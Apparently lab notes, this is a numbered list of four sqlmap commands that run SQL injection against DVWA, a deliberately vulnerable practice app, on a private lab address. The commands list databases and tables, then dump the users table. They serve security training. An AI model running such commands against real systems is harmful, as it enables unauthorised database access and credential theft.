17
sqlmap -u "http://10.0.2.12/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie=" " --method=GET --dbs

18
sqlmap -u "http://10.0.2.12/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie=" " --method=GET -D dvwa --tables

19
sqlmap -u "http://10.0.2.12/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie=" " --method=GET -D dvwa -T users --columns

20
sqlmap -u "http://10.0.2.12/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie=" " --method=GET -D dvwa -T users -C <list of columns> --dump






test
